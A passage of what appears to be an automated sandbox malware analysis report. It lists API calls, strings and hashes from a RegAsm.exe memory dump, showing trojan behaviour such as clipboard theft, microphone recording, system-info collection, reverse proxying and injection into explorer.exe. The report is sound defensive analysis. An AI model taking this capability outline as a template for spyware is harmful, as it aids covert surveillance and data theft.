                                                                                                                                                                      • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                                      • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                                                      • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                                                      • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                      • String ID: H
                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                      • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                      • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                      • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID: \&G$\&G$`&G
                                                                                                                                                                      • API String ID: 269201875-253610517
                                                                                                                                                                      • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                      • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                                                      • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                      • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 65535$udp
                                                                                                                                                                      • API String ID: 0-1267037602
                                                                                                                                                                      • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                      • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                                                      • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                      • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                                                      • _free.LIBCMT ref: 0043A9C3
                                                                                                                                                                      • _free.LIBCMT ref: 0043A9CA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2441525078-0
                                                                                                                                                                      • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                      • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                      • GetMessageA.USER32 ref: 0040556F
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                      • API String ID: 2956720200-749203953
                                                                                                                                                                      • Opcode ID: c1c3b9fa3f2ec3db4d6b6b73e886c266241c202666a46fd1ccd2ca1fadaa2b5d
                                                                                                                                                                      • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                                                      • Opcode Fuzzy Hash: c1c3b9fa3f2ec3db4d6b6b73e886c266241c202666a46fd1ccd2ca1fadaa2b5d
                                                                                                                                                                      • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                      • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                                                      • API String ID: 1704390241-2575729100
                                                                                                                                                                      • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                                                      • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                                                      • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                                                      • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                                                      • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                      • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                      • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                      • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                      • API String ID: 2172192267-604454484
                                                                                                                                                                      • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                      • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                                                      • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                      • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 221034970-0
                                                                                                                                                                      • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                      • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                                                      • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                      • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 100059EA
                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                      • _free.LIBCMT ref: 100059F6
                                                                                                                                                                      • _free.LIBCMT ref: 10005A01
                                                                                                                                                                      • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                      • _free.LIBCMT ref: 10005A17
                                                                                                                                                                      • _free.LIBCMT ref: 10005A22
                                                                                                                                                                      • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                      • _free.LIBCMT ref: 10005A38
                                                                                                                                                                      • _free.LIBCMT ref: 10005A43
                                                                                                                                                                      • _free.LIBCMT ref: 10005A51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 004481B5
                                                                                                                                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                      • _free.LIBCMT ref: 004481C1
                                                                                                                                                                      • _free.LIBCMT ref: 004481CC
                                                                                                                                                                      • _free.LIBCMT ref: 004481D7
                                                                                                                                                                      • _free.LIBCMT ref: 004481E2
                                                                                                                                                                      • _free.LIBCMT ref: 004481ED
                                                                                                                                                                      • _free.LIBCMT ref: 004481F8
                                                                                                                                                                      • _free.LIBCMT ref: 00448203
                                                                                                                                                                      • _free.LIBCMT ref: 0044820E
                                                                                                                                                                      • _free.LIBCMT ref: 0044821C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                      • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                      • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Eventinet_ntoa
                                                                                                                                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                                      • API String ID: 3578746661-3604713145
                                                                                                                                                                      • Opcode ID: 10bc0d34efa5f8356a24f65812d7822549cdab676620114cf207a6e13bd7d333
                                                                                                                                                                      • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                                                      • Opcode Fuzzy Hash: 10bc0d34efa5f8356a24f65812d7822549cdab676620114cf207a6e13bd7d333
                                                                                                                                                                      • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                                                                      APIs
                                                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                                                      • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                                                      • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                                                                                      • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                                                      • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                      • API String ID: 1462127192-2001430897
                                                                                                                                                                      • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                                                                                                      • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                                                                      • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                                                                                                      • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                      • API String ID: 2050909247-4242073005
                                                                                                                                                                      • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                                                                                      • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                                                                      • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                                                                                      • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                                                                      APIs
                                                                                                                                                                      • _strftime.LIBCMT ref: 00401D50
                                                                                                                                                                        • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                      • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                                                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                      • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
